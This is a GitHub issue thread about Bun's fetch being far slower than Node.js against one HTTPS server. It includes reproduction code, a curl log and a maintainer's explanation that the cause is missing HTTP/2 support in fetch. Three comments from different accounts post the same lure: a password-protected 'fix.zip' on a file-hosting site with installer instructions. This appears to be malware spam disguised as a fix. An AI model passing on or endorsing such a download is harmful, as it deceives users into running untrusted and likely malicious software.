### ISSUE TITLE
fetch (or axios) response delay from certain server

### ISSUE THREAD

**Issue by songinnight** [oven-sh/bun#13586]
### What version of Bun is running?

1.1.26+0a37423ba

### What platform is your computer?

Linux 6.8.0-1008-aws aarch64 aarch64 / Microsoft Windows NT 10.0.22631.0 x64

### What steps can reproduce the bug?

I have tested on AWS EC2 (Ubuntu) and Windows 11.
I don't know the exact cause, but there is a delay of around 10 seconds on Bun when running fetch (or axios) on certain servers.

Here is reproducing code. `fetch-lag.mjs`

```javascript
const main = async() => {
	
	const url = 'https://skylineinvest.evo-games.com/entry';
	// Server TLSv1.2 (TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384)
	
	
	const requestHeaders = {
		"user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36",
	};
	
	console.time('◀ Fetch Response Time');
	const resp = await fetch(url, {
		headers: requestHeaders,
		redirect: 'manual', // ignore 30X redirection
		verbose: true, // for Bun
	});
	
	console.timeLog('◀ Fetch Response Time'); // 0.5~1s on Node.js but, 8~10s on Bun
	
	console.log(`◀ RESPONSE HTTP CODE: ${resp.status} (${resp.statusText})`); // Might be 403 Forbidden
	
	const resBody = await resp.text();
	const resBodyLen =  resBody?.length || 0;
	
	console.log('◀ RESPONSE BODY LENGTH: ' + resBodyLen);
}

main();
```

Bun delaying 8~10 seconds.

```sh
bun fetch-lag.mjs
```

Node.js (v20.x) delay is ok. (about 0.5~1s)

```sh
node fetch-lag.mjs
```

### What is the expected behavior?

Should work same as node.js

### What do you see instead?

Experiencing long delay on Bun.

### Screenshot of Charles web debugger. (chrome browser)

![charles-evo](https://github.com/user-attachments/assets/76e09682-7b65-44f6-8e6b-6c3f74bd9e20)

**Comment by LC-JiaZhaorong** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by chenkeyu123** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by HTneko** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by cirospaciari** [comment]
Using `curl` and http 1.1 I can see that this endpoint sometimes never responded, with means we are waiting the server to close the connection (so we know we read everything), sometimes the server responds but takes a long time.
Node.js is using http2 in this case and the server is responding to http2 normally, Bun still dont support http2 on fetch but you can use `node:http2` for this.

```bash
curl -v --http1.1 https://skylineinvest.evo-games.com/entry
* Host skylineinvest.evo-games.com:443 was resolved.
* IPv6: (none)
* IPv4: 23.214.95.210, 23.214.95.202
*   Trying 23.214.95.210:443...
* Connected to skylineinvest.evo-games.com (23.214.95.210) port 443
* ALPN: curl offers http/1.1
* (304) (OUT), TLS handshake, Client hello (1):
*  CAfile: /etc/ssl/cert.pem
*  CApath: none
* (304) (IN), TLS handshake, Server hello (2):
* (304) (IN), TLS handshake, Unknown (8):
* (304) (IN), TLS handshake, Certificate (11):
* (304) (IN), TLS handshake, CERT verify (15):
* (304) (IN), TLS handshake, Finished (20):
* (304) (OUT), TLS handshake, Finished (20):
* SSL connection using TLSv1.3 / AEAD-CHACHA20-POLY1305-SHA256 / [blank] / UNDEF
* ALPN: server accepted http/1.1
* Server certificate:
*  subject: CN=akam.egcdn.com
*  start date: Aug 28 05:22:52 2024 GMT
*  expire date: Nov 26 05:22:51 2024 GMT
*  subjectAltName: host "skylineinvest.evo-games.com" matched cert's "skylineinvest.evo-games.com"
*  issuer: C=US; O=Let's Encrypt; CN=R11
*  SSL certificate verify ok.
* using HTTP/1.x
> GET /entry HTTP/1.1
> Host: skylineinvest.evo-games.com
> User-Agent: curl/8.7.1
> Accept: */*
> 
* Request completely sent off
``` 
Example of http2 request on bun:
```js
const http2 = require("node:http2");
const { promise, resolve, reject } = Promise.withResolvers();
const client = http2.connect("https://skylineinvest.evo-games.com/entry", {
  "user-agent":
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36",
});
client.on("error", reject);

const req = client.request({ ":path": "/" });

req.on("response", (headers, flags) => {
  for (const name in headers) {
    console.log(`${name}: ${headers[name]}`);
  }
});

req.setEncoding("utf8");
let data = "";
req.on("data", chunk => {
  data += chunk;
});
req.on("end", () => {
  client.close();
  resolve(data);
});
req.end();

const text = await promise;
console.log(text);
``` 

Closing the Issue, because http2 support on fetch can be tracked here: https://github.com/oven-sh/bun/issues/7194
